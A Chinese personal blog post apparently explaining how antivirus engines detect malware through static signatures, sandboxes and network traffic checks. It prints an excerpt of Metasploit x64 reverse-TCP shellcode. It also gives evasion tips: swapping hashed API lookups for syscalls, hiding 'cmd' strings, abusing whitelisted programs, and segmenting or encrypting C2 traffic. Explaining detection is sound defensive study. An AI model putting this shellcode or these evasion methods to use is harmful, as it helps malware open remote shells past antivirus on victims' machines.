<!DOCTYPE html>


<html lang="en">
  

    <head>
      <meta charset="utf-8" />
        
      <meta
        name="viewport"
        content="width=device-width, initial-scale=1, maximum-scale=1"
      />
      <title>杀毒软件的基本原理 |  小玉玉的博客</title>
  <meta name="generator" content="hexo-theme-ayer">
      
      <link rel="shortcut icon" href="/favicon.ico" />
       
<link rel="stylesheet" href="/dist/main.css">

      <link
        rel="stylesheet"
        href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css"
      />
      
<link rel="stylesheet" href="/css/custom.css">
 
      <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
       
 

      <!-- mermaid -->
      
    </head>
  </html>
</html>


<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-杀毒软件的基本原理"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  杀毒软件的基本原理
</h1>
 

      
    </header>
     
    <div class="article-meta">
      <a href="/2021/03/03/%E6%9D%80%E6%AF%92%E8%BD%AF%E4%BB%B6%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86/" class="article-date">
  <time datetime="2021-03-02T19:02:23.000Z" itemprop="datePublished">2021-03-03</time>
</a>   
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">1.3k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">5 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h2 id="杀毒软件的基本等级"><a href="#杀毒软件的基本等级" class="headerlink" title="杀毒软件的基本等级"></a>杀毒软件的基本等级</h2><h3 id="1-无害"><a href="#1-无害" class="headerlink" title="1.无害"></a>1.无害</h3><p>没有任何可疑行为，没有任何特征符合病毒</p>
<h3 id="2-可疑"><a href="#2-可疑" class="headerlink" title="2.可疑"></a>2.可疑</h3><p>存在可疑行为：操作注册表，打开powershell，修改用户，操作敏感文件等</p>
<h3 id="3-确认病毒"><a href="#3-确认病毒" class="headerlink" title="3.确认病毒"></a>3.确认病毒</h3><p>特征符合病毒</p>
<h2 id="杀毒软件的常用识别方式"><a href="#杀毒软件的常用识别方式" class="headerlink" title="杀毒软件的常用识别方式"></a>杀毒软件的常用识别方式</h2><h3 id="1-静态"><a href="#1-静态" class="headerlink" title="1.静态"></a>1.静态</h3><p>通常通过反编译的方式查看源代码</p>
<h4 id="1-1-代码中存在的函数"><a href="#1-1-代码中存在的函数" class="headerlink" title="1.1 代码中存在的函数"></a>1.1 代码中存在的函数</h4><p>virtualalloc，rtlmovememory，ntcreatthread等</p>
<p>主要都是windowsapi函数，尤其是和内存、堆、线程相关的函数</p>
<p>当然在python中如果存在“cmd”等关键词也是会被识别的：比如subprocess.popen（“cmd /c”）可以改为subprocess.popen（“命令”）</p>
<h4 id="1-2-shellcode的特征"><a href="#1-2-shellcode的特征" class="headerlink" title="1.2 shellcode的特征"></a>1.2 shellcode的特征</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">;-----------------------------------------------------------------------------;</span><br><span class="line">; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)</span><br><span class="line">; Compatible: Windows 7, 2003</span><br><span class="line">; Architecture: x64</span><br><span class="line">;-----------------------------------------------------------------------------;</span><br><span class="line">[BITS 64]</span><br><span class="line"></span><br><span class="line">; Input: RBP must be the address of &#39;api_call&#39;.</span><br><span class="line">; Output: RDI will be the socket for the connection to the server</span><br><span class="line">; Clobbers: RAX, RCX, RDX, RDI, R8, R9, R10, R12, R13, R14, R15</span><br><span class="line"></span><br><span class="line">reverse_tcp:</span><br><span class="line">  ; setup the structures we need on the stack...</span><br><span class="line">  mov r14, &#39;ws2_32&#39;</span><br><span class="line">  push r14               ; Push the bytes &#39;ws2_32&#39;,0,0 onto the stack.</span><br><span class="line">  mov r14, rsp           ; save pointer to the &quot;ws2_32&quot; string for LoadLibraryA call.</span><br><span class="line">  sub rsp, 408+8         ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment)</span><br><span class="line">  mov r13, rsp           ; save pointer to the WSAData structure for WSAStartup call.</span><br><span class="line">  mov r12, 0x0100007F5C110002        </span><br><span class="line">  push r12               ; host 127.0.0.1, family AF_INET and port 4444</span><br><span class="line">  mov r12, rsp           ; save pointer to sockaddr struct for connect call</span><br><span class="line">  ; perform the call to LoadLibraryA...</span><br><span class="line">  mov rcx, r14           ; set the param for the library to load</span><br><span class="line">  mov r10d, 0x0726774C   ; hash( &quot;kernel32.dll&quot;, &quot;LoadLibraryA&quot; )</span><br><span class="line">  call rbp               ; LoadLibraryA( &quot;ws2_32&quot; )</span><br><span class="line">  ; perform the call to WSAStartup...</span><br><span class="line">  mov rdx, r13           ; second param is a pointer to this stuct</span><br><span class="line">  push 0x0101            ;</span><br><span class="line">  pop rcx                ; set the param for the version requested</span><br><span class="line">  mov r10d, 0x006B8029   ; hash( &quot;ws2_32.dll&quot;, &quot;WSAStartup&quot; )</span><br><span class="line">  call rbp               ; WSAStartup( 0x0101, &amp;WSAData );</span><br><span class="line">  ; perform the call to WSASocketA...</span><br><span class="line">  push rax               ; if we succeed, rax wil be zero, push zero for the flags param.</span><br><span class="line">  push rax               ; push null for reserved parameter</span><br><span class="line">  xor r9, r9             ; we do not specify a WSAPROTOCOL_INFO structure</span><br><span class="line">  xor r8, r8             ; we do not specify a protocol</span><br><span class="line">  inc rax                ;</span><br><span class="line">  mov rdx, rax           ; push SOCK_STREAM</span><br><span class="line">  inc rax                ;</span><br><span class="line">  mov rcx, rax           ; push AF_INET</span><br><span class="line">  mov r10d, 0xE0DF0FEA   ; hash( &quot;ws2_32.dll&quot;, &quot;WSASocketA&quot; )</span><br><span class="line">  call rbp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );</span><br><span class="line">  mov rdi, rax           ; save the socket for later</span><br><span class="line">  ; perform the call to connect...</span><br><span class="line">  push byte 16           ; length of the sockaddr struct</span><br><span class="line">  pop r8                 ; pop off the third param</span><br><span class="line">  mov rdx, r12           ; set second param to pointer to sockaddr struct</span><br><span class="line">  mov rcx, rdi           ; the socket</span><br><span class="line">  mov r10d, 0x6174A599   ; hash( &quot;ws2_32.dll&quot;, &quot;connect&quot; )</span><br><span class="line">  call rbp               ; connect( s, &amp;sockaddr, 16 );</span><br><span class="line">  ; restore RSP so we dont have any alignment issues with the next block...</span><br><span class="line">  add rsp, ( (408+8) + (8*4) + (32*4) ) ; cleanup the stack allocations</span><br></pre></td></tr></table></figure>
<p>以msf举例，杀毒软件最常用的就是判断 mov r10d, 0x0726774C   ; hash( “kernel32.dll”, “LoadLibraryA” )这一部分的代码来识别，通常汇编层级下的代码要深入识别查杀对杀毒软件来说有一定误判的风险，所以一般的杀毒引擎都是通过shellcode中的特征码来识别，比如这一句代码可以用syscall代替试试（也就是直接纯手动找函数偏移而不是直接hash去找）</p>
<p>每个杀毒软件可能找的地方都不一样，推荐使用myccl+ida详细找一下具体查杀的哪个位置</p>
<h4 id="1-3-文件名称或md5"><a href="#1-3-文件名称或md5" class="headerlink" title="1.3 文件名称或md5"></a>1.3 文件名称或md5</h4><p>不多介绍，看标题就懂。</p>
<h4 id="1-4-加密（可疑）"><a href="#1-4-加密（可疑）" class="headerlink" title="1.4 加密（可疑）"></a>1.4 加密（可疑）</h4><p>使用加密解密行为或者对文件有额外保护措施</p>
<h3 id="2-动态"><a href="#2-动态" class="headerlink" title="2.动态"></a>2.动态</h3><p>通常这一步都是静态分析之后做的，部分杀毒软件会有沙盒</p>
<blockquote>
<p>沙盒：也叫启发式查杀，通过模拟计算机的环境执行目标文件再观察特征行为</p>
<p>沙盒模拟的常见特征：</p>
<p>内存较小-》不影响计算机正常运行</p>
<p>时间较快-》沙盒内置的时间速度比现实世界要快，提高查杀速度</p>
<p>进程或文件不完整-》减少杀毒软件运行时对计算机的消耗</p>
<p>io设备缺失-》鼠标键盘等事件大部分沙盒都没有</p>
</blockquote>
<h4 id="2-1-计算机相关"><a href="#2-1-计算机相关" class="headerlink" title="2.1 计算机相关"></a>2.1 计算机相关</h4><p>通常由r1或r2层挂监控的方式（类似于hook）当触发这些条件就会产生事件</p>
<h5 id="服务"><a href="#服务" class="headerlink" title="服务"></a>服务</h5><h5 id="注册表"><a href="#注册表" class="headerlink" title="注册表"></a>注册表</h5><h5 id="组策略"><a href="#组策略" class="headerlink" title="组策略"></a>组策略</h5><h5 id="防火墙"><a href="#防火墙" class="headerlink" title="防火墙"></a>防火墙</h5><h5 id="敏感程序："><a href="#敏感程序：" class="headerlink" title="敏感程序："></a>敏感程序：</h5><p>cmd powershell wmi psexec bitsadmin rundll等</p>
<h5 id="用户"><a href="#用户" class="headerlink" title="用户"></a>用户</h5><p>添加，删除，修改等操作</p>
<h5 id="文件夹："><a href="#文件夹：" class="headerlink" title="文件夹："></a>文件夹：</h5><p>C:/windows/system32 </p>
<p>C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup </p>
<p>C:\tmp等敏感文件夹</p>
<h5 id="常见的绕过思路"><a href="#常见的绕过思路" class="headerlink" title="常见的绕过思路"></a>常见的绕过思路</h5><p>白名单调用这些敏感行为，再导入恶意内容</p>
<h4 id="2-2-网络相关"><a href="#2-2-网络相关" class="headerlink" title="2.2 网络相关"></a>2.2 网络相关</h4><h5 id="IP，域名，证书匹配"><a href="#IP，域名，证书匹配" class="headerlink" title="IP，域名，证书匹配"></a>IP，域名，证书匹配</h5><p>查找通讯的ip或域名是否之前存在攻击行为</p>
<h5 id="流量内容"><a href="#流量内容" class="headerlink" title="流量内容"></a>流量内容</h5><p>时间特征：扫描等</p>
<p>内容特征：data字段中是否存在命令相关关键词或关键词加密特征</p>
<p>结构特征：是否存在已知远控的通讯结构特征</p>
<h5 id="常见的绕过思路-1"><a href="#常见的绕过思路-1" class="headerlink" title="常见的绕过思路"></a>常见的绕过思路</h5><p>tcp分段，内容加密，使用合法证书等</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>不是所有的杀毒软件都有这些，有些比较拉跨，有些比较强，不过总体的思路都是差不多的。</p>
<h3 id="对编程语言的免杀方式"><a href="#对编程语言的免杀方式" class="headerlink" title="对编程语言的免杀方式"></a>对编程语言的免杀方式</h3><p>powershell-》混淆、加密</p>
<p>c++-》编译过程、混淆、加密</p>
<p>python-》混淆、加密</p>
<p>通用-》启发式查杀</p>
<h3 id="杀毒软件与反外挂"><a href="#杀毒软件与反外挂" class="headerlink" title="杀毒软件与反外挂"></a>杀毒软件与反外挂</h3><p>相同点：都有基于至少r2层的监控（监控不多，主要是驱动证书这类的）</p>
<p>不同点：不需要动态，也就不需要沙盒，反外挂程序会有针对需要保护的程序做dll或者进程的额外监控，部分反外挂程序也会有“扫盘”（也就是对整个计算机文件内容做检测），反外挂程序对应用权限不敏感</p>
 
      <!-- reward -->
      
    </div>
    

    <!-- copyright -->
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://cutecuteyu.gitee.io/2021/03/03/%E6%9D%80%E6%AF%92%E8%BD%AF%E4%BB%B6%E7%9A%84%E5%9F%BA%E6%9C%AC%E5%8E%9F%E7%90%86/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2021/03/03/%E8%BD%AC%E8%BD%BD%E6%96%87%E7%AB%A0-%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%9A%84%E7%BB%8F%E6%B5%8E%E5%AD%A6%E5%8E%9F%E7%BD%AA%EF%BC%9A%E5%88%A9%E6%B6%A6%E7%A7%81%E6%9C%89%E5%8C%96%EF%BC%8C%E4%BA%8F%E6%8D%9F%E7%A4%BE%E4%BC%9A%E5%8C%96/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            转载文章-网络安全的经济学原罪：利润私有化，亏损社会化
          
        </div>
      </a>
    
    
      <a href="/2021/02/05/%E4%B8%A4%E7%A7%8D%E7%A4%BE%E4%BC%9A%E4%B9%8B%E9%97%B4-%E7%BD%91%E7%BB%9C%E4%BE%B5%E7%8A%AF%E8%A1%8C%E4%B8%BA%E7%9A%84%E7%A4%BE%E4%BC%9A%E5%AD%A6%E7%A0%94%E7%A9%B6%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">两种社会之间-网络侵犯行为的社会学研究</div>
      </a>
    
  </nav>

  
   
     
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2020-2021
        <i class="ri-heart-fill heart_icon"></i> 萌萌哒的小玉玉
      </li>
    </ul>
    <ul>
      <li>
        
        
        
        Powered by <a href="https://hexo.io" target="_blank">Hexo</a>
        <span class="division">|</span>
        Theme - <a href="https://github.com/Shen-Yu/hexo-theme-ayer" target="_blank">Ayer</a>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>Visitors:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>Views:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>
      <div class="float_btns">
        <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

      </div>
    </main>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/images/ayer-side.svg" alt="小玉玉的博客"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="Search">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/alipay.jpg">
      <span class="reward-type">支付宝</span>
    </div>
    
    
    <div class="reward-item">
      <img class="reward-img" src="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/img/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-2.0.3.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.jsdelivr.net/npm/jquery-modal@0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css">
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->

<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
  </div>
</body>

</html>